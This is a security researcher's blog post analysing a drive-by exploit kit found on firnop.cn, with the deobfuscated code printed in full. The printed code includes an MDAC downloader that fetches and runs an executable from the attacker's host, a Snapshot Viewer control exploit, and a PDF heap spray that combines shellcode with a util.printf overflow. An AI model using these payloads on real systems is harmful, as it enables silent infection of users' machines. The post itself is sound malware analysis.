Blog for hpHosts, and whatever else I feel like writing about ....

Wednesday 7 January 2009

firnop.cn - MDAC + PDF + Snapshot viewer control exploits

I was asked to look at firnop.cn (IP: 195.24.78.242, PTR: B088.com) by Connie yesterday, due to its containing some rather suspicious code. I was not to be disappointed.

As I told Connie, this one only allows access once per IP; after that, you get a lovely little 404. I thought this was only going to be a once-per-day job, but alas no, this is the second day and I still can't access the original code there now. Fear not, your clever blogger saved a copy of the original vURL result;

vURL Online - Results for firnop.cn
http://hosts-file.net/misc/firnop_cn/vURL_Online_-_firnop_cn.html

This shows some rather obfuscated code hidden once again in a form field (this time one called rosorur), which is then loaded dynamically courtesy of document.getElementById('rosorur').value. To decode this, we'll need two things;

1. Malzilla (malzilla.sourceforge.net)

Malzilla is my favourite tool for decoding obfuscated or encoded scripts, and has been since its inception. If you're not using it already and are working with malicious sites, give it a try.

2. Small change to the original code

The small change we need to make is to ditch the HTML and move the content of the rosorur text box to its own variable. Once we've done this, we can simply change;

eval(document.getElementById('rosorur').value)

To;

eval(rosorur)

If we now run this through Malzilla, we're given the following results. The CLSID on the visible object tag (88d969c5-f192-11d4-a65f-0040963251e5) is the MSXML 4.0 XMLHTTP component; note, though, that the strings that matter inside goMDAC(), including a second CLSID and the ProgIDs it instantiates, are hidden behind the dddec() substitution routine and only appear once that is run. Three delivery paths are wired up: goMDAC() for the MDAC exploit, goSnap() for the Snapshot Viewer control, and a hidden iframe plus goPDF() for the PDF served by getfile.php.

<object id=xmltarget classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5"></object>
<SCRIPT type='text/javascript'>
function errfuck()
{
  return true;
}
window.onerror=errfuck;
function dddec(str)
{
  cto="GsHkUqw1S2Kba0QPivRDnAyr9lJYm4TcF6IXo3Mx7BENtjCZpuf5gW8zVhLdeO";
  cfrom="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890";
  res="";
  for (i=0;i<str.length;i++)
  {
   c=str.charAt(i);
   pos=cto.indexOf(c);
   if (pos!=-1)
   res+=cfrom.charAt(pos);
   else
   res+=c;
  }
  return res;
}
function goMDAC()
{
  d8= 0;
  var Qy29Nd = document.createElement(dddec("SriHAU"));
  Qy29Nd.setAttribute("id",dddec("JqWefa"));
  Qy29Nd.setAttribute("classid",dddec("ARb1a:uMehZVVh-hVo8-ggMO-ed8o-OOZOzxZWem8h"));
  try
  {
   var LoWMFJ = Qy29Nd.CreateObject(dddec("KaSar.bUkHKl"),'');
   var d8 = 1;
  }
  catch(e)
  {
  }
  try
  {
   var PEELt6 = Qy29Nd.CreateObject(dddec("3PHRR.o22R1AKU1S9"),'');
   var d8 = 1;
  }
  catch(e)
  {
  }
  if(d8 == 1)
  {
   try
   {
    var JB7Ebp = Qy29Nd.CreateObject(dddec("lbnlRW.C5tBTTX"),'');
    JB7Ebp.open("GET","http://firnop.cn/getexe.php?h=11",false);
    JB7Ebp.send();
    LoWMFJ.type = 1;
    LoWMFJ.open();
    LoWMFJ.Write(JB7Ebp.responseBody);
    Frogxa = "..\\S87ekhV.exe";
    LoWMFJ.SaveToFile(Frogxa,2);
    eval(dddec("XmmtUh.3PHRRmnHAwUH(xkSQnK);"));
    //return 1;
   }
   catch(e)
   {
   }
  }
}
function goPDF()
{
  wnd=window;
  while (wnd.parent!=wnd)
  wnd=wnd.parent;
  wnd.location="getfile.php?f=vispdf";
}
function goSnap()
{
  var sfrom = 'http://firnop.cn/getexe.php?h=12';
  var fuckavo="SB";
  var x;
  var fuckavp="SB";
  var obj;
  var fuckavx="SB";
  var mycars = new Array();
  var fuckava="SB";
  mycars[0] = "c:/Program Files/Outlook Express/WAB.EXE";
  mycars[1] = "d:/Program Files/Outlook Express/WAB.EXE";
  mycars[2] = "e:/Program Files/Outlook Express/WAB.EXE";
  var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
  if(objlcx)
  {
   setTimeout('window.location = "ldap://"',3000);
   for (x in mycars)
   {
    obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")
    var buf1 = sfrom;
    var fuckavg="SB";
    var buf2=mycars[x];
    var fuckavj="SB";
    obj.Zoom = 0;
    obj.ShowNavigationButtons = false;
    obj.AllowContextMenu = false;
    obj.SnapshotPath = buf1;
    try
    {
     obj.CompressedPath = buf2;
     obj.PrintSnapshot();
    }
    catch(e)
    {
    }
   }
  }
  var fuckavqgga="SB";
  var fuckavqggxa="SBd";
}
setTimeout('goMDAC();',3500);
setTimeout('goSnap();',1);
try
{
  var obj = null;
  obj = new ActiveXObject("AcroPDF.PDF");
  if (!obj)
  {
   obj = new ActiveXObject("PDF.PdfCtrl");
  }
  if (obj)
  {
   document.write("<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
   setTimeout('goPDF();',5000);
  }
}
catch(e)
{
  document.write("<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
  setTimeout('goPDF();',5000);
}
</script>


Unfortunately, the only ones I could actually download were f=pdf and f=vispdf, so let's analyze those, shall we? First of all, we need to uncompress them, since the JavaScript sits inside compressed PDF streams and is not visible in a text editor. For this we'll use pdftk and its uncompress output option.

Once the JavaScript is dumped, we see a Base64-looking string that is decoded courtesy of the following routine. Two things to notice before reaching for a stock base64 tool: as listed here, the main loop shifts the third character of each quadruple right (>>6) rather than left, which is not what a standard decoder does (the tail case below it uses <<6, so check the operator in the dumped script before relying on this listing), and any decoded byte of 168 or more is mapped through a lookup string AZ that is not part of this excerpt. The reliable approach is the same as for the first stage: run the decoder itself, with the final eval swapped for output;

function func(str) {
  b64s="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  while(str.substr(-1,1)=="=")str=str.substr(0,str.length-1);
  var b=str.split(""), i
  var s=Array(), t
  var lPos = b.length - b.length % 4
  for(i=0;i<lPos;i+=4){
    t=(b64s.indexOf(b[i])<<18)+(b64s.indexOf(b[i+1])<<12)+(b64s.indexOf(b[i+2])>>6)+b64s.indexOf(b[i+3])
    s.push( ((t>>16)&0xff), ((t>>8)&0xff), (t&0xff) )
  }
  if( (b.length-lPos) == 2 ){ t=(b64s.indexOf(b[lPos])<<18)+(b64s.indexOf(b[lPos+1])<<12); s.push( ((t>>16)&0xff)); }
  if( (b.length-lPos) == 3 ){ t=(b64s.indexOf(b[lPos])<<18)+(b64s.indexOf(b[lPos+1])<<12)+(b64s.indexOf(b[lPos+2])<<6); s.push( ((t>>16)&0xff), ((t>>8)&0xff) ); }
  for( i=s.length-1; i>=0; i-- ){
    if( s[i]>=168 ) s[i]=AZ.charAt(s[i]-163)
    else s[i]=String.fromCharCode(s[i])
  };
  eval(s.join(""))
}


If we then have Malzilla decode this, we're given yet another encoded script, one that this time needs to be handled a little differently;

vikekide2=unescape("%u03eb%ueb59%ue805%ufff8%uffff%u494f%u4949%u4949%u5149%u565a%u5854%u3336%u5630%u3458%u3041%u3642%u4848%u4230%u3033%u4342%u5856%u4232%u4244%u3448%u3241%u4441%u4130%u5444%u4442%u4251%u4130%u4144%u5856%u5a34%u4238%u4a44%u4d4f%u4e4b%u5142%u554c%u544c%u3343%u4c49%u4648%u4b49%u334e%u5041%u4842%u5346%u304c%u4949%u4e44%u4f4c%u4e4b%u5045%u4e4a%u4e4b%u4f4f%u4f4f%u4f4f%u5742%u544e%u4949%u5949%u5949%u4c43%u4f4d%u334a%u4a49%u5949%u4949%u5949%u3144%u4d49%u3945%u4144%u4e49%u4845%u4346%u3144%u4d49%u3941%u3144%u5441%u3144%u4e4c%u4a45%u4144%u4e4d%u3847%u4e41%u394c%u564c%u3144%u4e47%u4b49%u594c%u5644%u5144%u4d47%u584d%u4a4c%u4746%u4c4f%u4c50%u4c4a%u5144%u4a48%u494c%u3644%u4144%u564b%u4f43%u3947%u4c42%u464c%u334f%u4e4d%u3941%u4c42%u4c48%u414c%u3550%u394d%u4d4e%u374b%u3742%u4c42%u4c48%u4c47%u5144%u5546%u3144%u4d4f%u4b4d%u594c%u554c%u544a%u574a%u594c%u354a%u4a4c%u4542%u4f4f%u4144%u4941%u3144%u4d4f%u5845%u494c%u454c%u554a%u474a%u394b%u494c%u354a%u3144%u5949%u394c%u554c%u3144%u3643%u5144%u4650%u514c%u454f%u4947%u4144%u3449%u4f43%u494d%u4c42%u3741%u4c49%u5949%u4949%u5949%u314c%u354f%u3946%u4c4b%u4c4f%u5648%u4c50%u4645%u4c43%u5144%u4441%u4f43%u394a%u4c42%u3741%u4a46%u3949%u4949%u3949%u514c%u454f%u484c%u4c4f%u4d4f%u3149%u4a47%u3149%u4e4e%u3643%u4149%u4a4f%u5149%u4c47%u514c%u5745%u4b49%u3144%u4445%u4f43%u4b49%u4c4c%u5648%u4c50%u3745%u3550%u394d%u494c%u4c45%u4f4a%u4b47%u4f4e%u5550%u4d4d%u394c%u494d%u4e41%u4f4e%u4949%u5949%u4a4c%u5549%u4c49%u4c49%u4c4c%u4c4f%u4c49%u5648%u4c50%u4645%u3144%u5445%u4c49%u4c4c%u3648%u4c50%u5649%u4c49%u3648%u4c50%u364d%u4a4c%u3549%u3345%u514e%u3549%u4e4e%u5642%u4c4a%u4c4b%u4c4f%u4c4c%u5648%u344b%u4c43%u4c42%u3344%u474b%u5747%u4a4c%u5549%u554c%u5741%u4b4f%u3648%u5648%u5648%u4d50%u4f4e%u4e4d%u4c49%u4e4b%u4f48%u4f4c%u4d4a%u4f4d%u4f4d%u4e4b%u4f4e%u4e4c%u4e4c%u3949%u4d50%u4f4e%u4e4d%u4c4c%u4e42%u4e4c%u4e4d%u4f4e%u4f46%u4d4d%u4f42%u4e4b%u4f4e%u4f4c%u4e4d%u4f48%u4e4b%u4e42%u4d4a%u3949%u4c50%u4f42%u4f47%u4d4e%u4e41%u4f4e%u4f4c%u5949%u4d4e%u4e41%u4f42%u4e4d%u4c4d%u4f41%u4e4b%u4f4e%u4f4a%u4f4d%u3949%u4d45%u4f48%u4f4a%u4f4d%u4d45%u4f42%u4f4b%u4e4b%u4f4a%u4e4b%u4e42%u4d4a%u4949%u4e4e%u4e4b%u4f45%u4f46%u4f48%u4f47%u5949%u4c4e%u4c4b%u4d45%u4d4d%u4f48%u4e50%u4f47%u4f45%u4f48%u4f4a%u4f4d%u4c4d%u4f48%u4d4f%u4f42%u4f45%u4f4e%u4d4a%u3949%u364a%u3746%u5746%u5742%u434c%u524f%u324f%u4648%u5649%u3744%u3650%u364f%u3742%u3250%u4643%u4650%u324f%u5647%u4645%u3746%u3645%u574a%u5645%u4250%u5742%u564a%u5742%u434f%u564a%u534d%u5343%u3341%u4842%u005a");
var robedimup=unescape("%u0A0A%u0A0A");
var tupari=20;
var tosib=tupari+vikekide2.length;
while(robedimup.length<tosib)robedimup+=robedimup;
var vamuniveso=robedimup.substring(0,tosib);
var sevusupo=robedimup.substring(0,robedimup.length-tosib);
while(sevusupo.length+tosib<0x60000)sevusupo=sevusupo+sevusupo+vamuniveso;
var bibale=new Array();
for(lepefela6=0;lepefela6<1200;lepefela6++){bibale[lepefela6]=sevusupo+vikekide2}
var rufirubed5=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",rufirubed5);


If we try having Malzilla actually decode the PDF script, Malzilla will freeze and crash, which is not surprising: running it for real means building the spray, 1,200 copies of a string of at least 0x60000 UTF-16 code units, on the order of a gigabyte of memory. So instead we'll have it convert the string to hex, then save that. This gives us a new .bin file containing a hex dump. Loading this in Malzilla and using its Shellcode Analyzer shows:



This shows us the executable coming from;

firnop.cn/getexe.php?h=32

MD5: E27BB8F8ADEB613305F5DE9A68C125DB

HTTP/1.1 200 OK
Date: Thu, 08 Jan 2009 10:16:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Length: 85504
Content-Disposition: attachment; filename=update.exe
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/octet-stream


Detection, sadly, is rubbish;

http://www.virustotal.com/analisis/1fac7fccd549f08c83373ab686062b0c

Sandbox report will be added once it's finished (tried Anubis but for some reason, it failed with an "XML could not be found" error)

/edit 12-01-2009

Sadly, the sandboxes still haven't gotten back to me (submitted to Anubis and MS's sandboxes). However, I've just noticed on Honeyblog's feed that CWSandbox has this one (or a variant of it at least, as its network activity shows firnop.cn), so that'll have to do;

https://cwsandbox.org/?page=report&analysisid=879663&password=vqtgp
